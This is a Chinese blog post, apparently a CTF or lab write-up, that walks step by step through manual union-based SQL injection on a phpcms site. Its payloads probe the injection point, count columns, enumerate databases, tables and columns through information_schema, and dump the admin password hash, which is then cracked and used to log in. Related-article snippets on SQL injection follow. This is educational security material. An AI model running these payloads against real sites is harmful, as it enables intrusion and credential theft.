基于phpcms的SQL手工注入

最新推荐文章于 2024-08-13 02:37:06 发布
最新推荐文章于 2024-08-13 02:37:06 发布
阅读量524 收藏 3
点赞数 1
分类专栏: CTF 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44060093/article/details/108121112
版权

步骤一:
探测目标网站有无sql注入点
试探目标网站 分别在地址末尾添加单撇号、and 1=1 和 and 1=2 进行注入点探测。
在这里插入图片描述
and 1=1
在这里插入图片描述
and 1=2
在这里插入图片描述
发现不需要闭合但引号,判断为注入类型为整数型
第一次加单引号时,发生报错,发现了数据库类型为mysql
步骤二、判断字段长度
利用 order by N,从数字 1 开始替代 N,直到返回错误页面,判断字段长度为错误页面的 N-1,也就是最后一个正常页面返回。实验中N=16,错误,所以字段长度为15
在这里插入图片描述
在这里插入图片描述
判断字段为15个
步骤三、判断字段位置回显
利用show.php?id=XX and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 最后一个数为字段长度,有回显会将相应数字显示出来。从下图可知,3 和 11 的位置可以回显信息。判断数据库信息
在这里插入图片描述
步骤四、判断数据库相关信息
(1)查看 mysql 版本
在这里插入图片描述
(2)查看当前数据库名
在这里插入图片描述(3)查看当前用户
在这里插入图片描述
步骤五、判断所有数据库名
利用 and 1=2 union select 1,2,group_concat(convert(SCHEMA_NAME using latin1)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.SCHEMATA,查看 mysql中所有数据库的名称。

由下图结果可知业务数据库为 cms。其他数据库有mysql,test等
在这里插入图片描述
步骤六、判断具体某个数据库中的数据库表
利用 and 1=2 union select 1,2,group_concat(convert(table_name using latin1)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database() ,查看 cms 数据库拥有的所有表。可以发现存放用户信息的表cms_users。
在这里插入图片描述
如下查看其它数据库中的数据表,则需要将。。。where table_schema=database()处的database() 替换为具体的数据库名,并且数据库名要16进制转化为0xAAABBBCCCC格式

步骤七、判断数据表的所有列
利用 and 1=2 union select 1,2,group_concat(convert(column_name using latin1)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name=0x636D735F7573657273。

table_name=cms_users表名需要编码为 16 进制table_name=0x636D735F7573657273形式,从ASCII对照表中可知对应:c(63) m(6d) s(73) _(5f) u(75) s(73) e(65) r(72) s(73)

如图所示,得到 3 个列:userid,username 和 password
在这里插入图片描述
步骤八、判断管理员账号密码
利用 and 1=2 union select 1,2,concat_ws(0x2b,userid,username,password),4,5,6,7,8,9,10,11,12,13,14,15 from cms.cms_users

得到管理员账号密码为:admin/e10adc3949ba59abbe56e057f20f883e(解密后123456)
在这里插入图片描述
步骤十、登录后台
在这里插入图片描述
在这里插入图片描述

K—C
关注
专栏目录
动态调试|Maccms SQL 注入分析(附注入盲注脚本)
xiaoi123的博客
08-28 994
0x01 前言 已经有一周没发表文章了,一个朋友叫我研究maccms的代码审计,碰到这个注入的漏洞挺有趣的,就在此写一篇分析文。 0x02 环境 Web: phpstudy System: Windows 10 X64 Browser: Firefox Quantum Python version : 2.7 Tools: JetBrains PhpStorm 2018.1.6 x64、Se...
Web安全Day1 - SQL注入实战攻防
hongrisec的博客
02-20 3178
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.Web安全Day1 - SQL注入实战攻防 https://mp.weixin.qq.com/s/zP0MZNhnZG_S9aoHDXzvWA 1. SQL注入 1.1 漏洞简介 结构化查询语言(Structured Query Language...
审计一套CMS中的SQL注入
weixin_30790841的博客
08-07 367
漏洞分为系统漏洞和应用漏洞,系统漏洞以二进制漏洞为代表,其挖掘难度较高需要对反汇编和操作系统原理深入理解,而除了系统漏洞以外还有一些应用漏洞,包括不限MySQL,Apache,为代表的Web漏洞,这里我们就挖掘PHP代码层面的漏洞。 漏洞的挖掘也分为,点对点挖掘漏洞,和分散式挖掘漏洞,这我们主要使用点对点挖掘,在挖掘是我们需要找一些关键字,漏洞本身就是两个条件,可控的函数,和可控的变量...
sql注入实战-cmseasy注入
最新发布
2301_79915754的博客
08-13 330
分析:拿到安全码,被base64_decode解码,然后被xxtea_decrypt函数解密,全部解密完之后进行反序列化;未授权登陆:实现__construct函数里面的当两个条件,就不会验证check_admin;这里看一下getrow函数是干嘛的:发现'1 desc' 是在对数据库进行操作;然后user似乎跟数据库有关,这里看一下:table这里发现确实跟数据库有关;因为IP是HTTP_X_FORWARDED_FOR来获取的,可以伪造;现在登陆后台查看cookie安全码位置,复制网址并退出登陆;
SQL注入:对cms管理系统进行SQL注入,分别使用手工注入和自动化注入两种方法,获取管理员的账号密码。
2401_83124412的博客
06-29 360
进行字符转码:cms_article,cms_category,cms_file,cms_friendlink,cms_message,cms_notice,cms_page,cms_users。id=33 and 1=1 /and 1=2判断。3.爆破字段,猜测数据在cms_users表里面,查看字段,有id,username,password三个字段。回显报错信息,因为联合查询,每列的数据类型不同而报错,将 table_name。传参id=33’,报错’’’,可初步判定存在数字型注入点,进一步验证。
phpcms 存在SQL注入(CVE-2022-26613)
weixin_68999845的博客
08-16 1517
1.下载源码到本地:https://codeload.github.com/harshitbansal373/PHP-CMS/zip/refs/heads/master。PHPCMS v1.0 版本存在安全漏洞,该漏洞源于 categorymenu.php 中的 category 参数。源码下载url:https://github.com/harshitbansal373/PHP-CMS。参数$query后跟随sql语句,接收参数category,未做任何处理,存在sql注入,无需绕过。
phpcmsV9.6.0sql注入漏洞分析
shelter1234567的博客
09-11 1580
本次分析phpcmsV9.6.0 的sql注入漏洞,过程很曲折,就像cc链一样,要一步一步找到利用的链。纯手动分析没有软件调试,中间找类啊,方法啊 ,都是按照代码流程写的流程分析的,对自己也是一个挑战吧!
自用护w面试题
Zephyr_Misaka的博客
06-01 1080
21-FTP 看是否存在匿名访问22-SSH 看是否存在弱口令25-SMTP80-HTTP 常见web漏洞443-HTTPS openSSl心脏出血漏洞445-smb ms08-067、 ms17-0101433-mssql 弱口令1521-oracle, 弱口令3306-mysql 数据库的默认端口3389-windows远程桌面 弱口令7001-weblogic的默认端口 8080-tomcat漏洞应用层:为应用程序提供网络服务表示层:数据格式化、加密、解密会话层:建立、管理和维护会话连接传输层:建立
04 渗透测试基础
热门推荐
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
渗透框架
u012922879的博客
08-22 1177
一 信息收集 1是否存在CDN 2服务器信息 IP 支持脚本 容器版本 开放端口情况(21,22,80,1433,5900,3306,3389,8080,43958) 绝对路径(报错页面显示、探针显示)) 3子域名查询 4 whois 查询域名所有者的信息和邮箱 生成破解字典 5 指纹验证 核实目标站点采用何种cms搭建 然后定制方案 御剑指纹识别 云悉指纹识别 ...
渗透相关问题(一)
zjdda的博客
05-17 2489
渗透测试学习笔记
答疑存在sql注入的php168cms
08-15
该cms问题答疑处存在sql注入,可sqlmap跑数据库。。。
Sql注入工具php,phpcms框架SQL注入--基于Havij工具
weixin_39754267的博客
03-17 360
sql注入的步骤:1.首先观察网站是通过GET还是POST方式传输数据的:a.如果是GET传输,则在url中输入?id=1' 或者 " 或者 ') 来测试是否存在sql注入。b.如果是POST传输,则在输入框中输入?id=1' 或者 " 或者 ') 来测试是否存在sql注入。2.测试完成发现存在注入,进行注入,先测试有多少表单:a.?id=1 order by *(*数字为数字)进行测试,3.测试...
基于PHPCMSSQL注入(Havij)
未名编程
07-17 2070
本教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险。 目录实验目的实验环境实验原理实验步骤第一步靶机操作第二步渗透主机操作实验总结 实验目的 通过本实验理解SQL注入基本原理和过程,掌握菜刀和Havij等注入工具的使用方法,了解SQL注入的危害。通过本实验,掌握SQL注入点识别方法、测试方法、自动化工具使用方法以及进行防御的基本方法。 实验环境 测试渗透机:win2k8SvrTester 工具:中国菜刀、Havij 目标服务器(靶机):phpcms网站 目标网站:http://IP:80.
phpcms_v9.6.0的SQL注入
公众号shadow sock7
12-06 6244
参考: https://zhuanlan.zhihu.com/p/26263513 安装 phpcms所有版本安装: http://download.phpcms.cn 步骤 先拿到cookie 将这个cookie值作为userid_flash的值 并带上src参数的值为urlencoded的SQL注入payload。 这里的payload为: 得到wknv_att_json的值,并作为...
狮子鱼cms-SQL注入
weixin_46663238的博客
10-20 2251
狮子鱼CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞 FOFA语法: “/seller.php?s=/Public/login” 后台登录界面 漏洞点:ApiController.class.php public function goods_detail() { $goods_id = I('get.goods_id'); //gallery =>img_url //go...
黑客学习-SQL注入:利用Havij对PHPCMS网站进行SQL注入
weixin_49349476的博客
09-21 2032
首先判断是否能SQL注入,之后利用Havij进行SQL注入,获取网站管理员的账号和密码
【某CMS漏洞】SQL注入漏洞分析
qingkahui24689的博客
05-25 960
本文直接从一个入口的注入点展开,想找到一条合适的链路到GetShell的完整过程,但是遗憾的是,没能解决6位随机后台地址的问题,故实际利用起来的话,局限性还是有的,姑且称之为一次分享式的尝试性代码审计体验录吧。黑客&网络安全如何学习。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值